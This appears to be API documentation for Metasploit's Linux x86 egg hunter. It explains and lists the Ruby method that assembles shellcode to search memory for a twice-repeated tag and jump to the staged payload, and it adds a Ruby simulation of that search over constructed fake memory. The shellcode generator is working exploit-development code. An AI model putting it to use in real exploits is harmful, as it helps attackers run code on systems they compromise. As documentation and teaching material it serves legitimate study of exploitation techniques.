Rex::Exploitation::Egghunter::Linux::X86

Public Instance Methods

hunter_stub(payload, badchars = '', opts = {})

The egg hunter stub for linux/x86. It walks memory upward from ecx (or from opts[:startreg], which is copied into ecx first), probing each address with the sigaction syscall (eax = 0x43) and treating an EFAULT return (al == 0xf2) as "unmapped", in which case `or cx,0xfff` followed by `inc ecx` skips to the start of the next page instead of stepping byte by byte. At each readable address it compares the 4-byte opts[:eggtag] twice with scasd, so the egg in memory must be the tag repeated twice followed by the payload; only after both compares succeed does `jmp edi` transfer control to the byte after the second tag. Matching twice also stops the hunter from halting on the single copy of the tag embedded in its own `mov eax,<tag>` immediate. opts[:eggtag] must be exactly 4 bytes (it is encoded as a 32-bit little-endian immediate), and checksum_stub may append an optional payload checksum check before the jump.

# File lib/rex/exploitation/egghunter.rb, line 246
def hunter_stub(payload, badchars = '', opts = {})

        startreg = opts[:startreg]

        # the tag becomes a 32-bit immediate (mov eax,imm32), so it must be exactly 4 bytes
        raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
        marker = "0x%x" % opts[:eggtag].unpack('V').first

        # optional checksum check appended before the final jump
        checksum = checksum_stub(payload, badchars, opts)

        # optionally seed the search address from another register
        startstub = ''
        if startreg
                if startreg.downcase != 'ecx'
                        startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr"
                else
                        startstub = "\n\tjmp next_addr"
                end
        end
        startstub << "\n\t" if startstub.length > 0

        assembly = <<EOS
        cld#{startstub}
check_readable:
        or cx,0xfff
next_addr:
        inc ecx
        push 0x43   ; use 'sigaction' syscall
        pop eax
        int 0x80
        cmp al,0xf2
        je check_readable
check_for_tag:
        ; check that the tag matches once
        mov eax,#{marker}
        mov edi,ecx
        scasd
        jne next_addr
        ; it must match a second time too
        scasd
        jne next_addr
        ; check the checksum if the feature is enabled#{checksum}
        ; jump to the payload
        jmp edi
EOS

        assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string

        # return the stub
        assembled_code
end
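The following is an added example, not code from this page or from Metasploit: a Ruby model of the search loop the stub above implements, run against a constructed page-granular stand-in for process memory rather than a real address space. build_egg lays out what the stub expects to find (tag, tag, payload); hunt mirrors the assembly instruction by instruction (the EFAULT page skip, the two scasd compares, the final jmp edi) and returns the address the stub would jump to. FakeMemory, hunt, build_egg, demo_memory, the PAGE constant, the `limit` parameter and the sample tag and payload are all assumptions of this example; the real stub loops until it finds the egg and has no limit.

```ruby
PAGE = 0x1000  # x86 page size; the stub's `or cx,0xfff` assumes it

# Build the egg the stub expects in memory: the 4-byte tag twice, then the
# payload (two scasd compares move edi past both copies before `jmp edi`).
def build_egg(tag, payload)
  raise ArgumentError, "egg tag must be exactly 4 bytes" unless tag.bytesize == 4
  tag.b + tag.b + payload.b
end

# Page-granular stand-in for process memory (constructed for this example):
# page base address => PAGE bytes. A missing page models an unmapped one,
# where the sigaction probe returns -EFAULT (0xf2 in al).
class FakeMemory
  def initialize(pages)
    @pages = pages
  end

  def readable?(addr)
    @pages.key?(addr & ~(PAGE - 1))
  end

  # Read n bytes at addr; nil if any byte lies in an unmapped page.
  def read(addr, n)
    out = "".b
    n.times do |i|
      a = addr + i
      return nil unless readable?(a)
      out << @pages[a & ~(PAGE - 1)].getbyte(a & (PAGE - 1))
    end
    out
  end
end

# Model of the stub's loop. Each step mirrors an instruction of the assembly
# above; `limit` exists only in this model (the real stub loops until it finds
# the egg). Returns the address `jmp edi` would transfer to, or nil.
def hunt(mem, tag, start:, limit: 0x10000)
  ecx = start                          # startreg is copied into ecx
  loop do
    ecx += 1                           # next_addr: inc ecx
    return nil if ecx >= limit
    unless mem.readable?(ecx)          # int 0x80 ... cmp al,0xf2 / je check_readable
      ecx |= 0xfff                     # check_readable: or cx,0xfff -> skip the page
      next
    end
    edi = ecx                          # mov edi,ecx
    next unless mem.read(edi, 4) == tag      # first scasd / jne next_addr
    next unless mem.read(edi + 4, 4) == tag  # second scasd / jne next_addr
    return edi + 8                     # jmp edi: edi advanced 4 bytes per scasd
  end
end

TAG     = "w00t".b           # constructed tag for this example
PAYLOAD = "\xcc".b * 8       # constructed stand-in payload (int3 sled)
EGG     = build_egg(TAG, PAYLOAD)

# Page 0x1000 holds the tag only once (as the hunter's own `mov eax,<tag>`
# immediate does), page 0x2000 is unmapped, page 0x3000 holds the egg at +0x200.
def demo_memory
  p1 = "\x90".b * PAGE
  p1[0x10, 4] = TAG
  p3 = "\x90".b * PAGE
  p3[0x200, EGG.bytesize] = EGG
  FakeMemory.new(0x1000 => p1, 0x3000 => p3)
end

def demo_hunt
  hunt(demo_memory, TAG, start: 0x1000)   # => 0x3208, the first payload byte
end

puts "payload found at 0x%x" % demo_hunt if $PROGRAM_NAME == __FILE__
```

The decoy on page 0x1000 passes the first compare and fails the second, which is exactly what the duplicated-tag egg layout buys you; the unmapped page 0x2000 is crossed in a single step rather than 4096 probes, which is what `or cx,0xfff` is for. If you change build_egg to emit the tag only once, demo_hunt returns nil, because the second scasd never matches.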
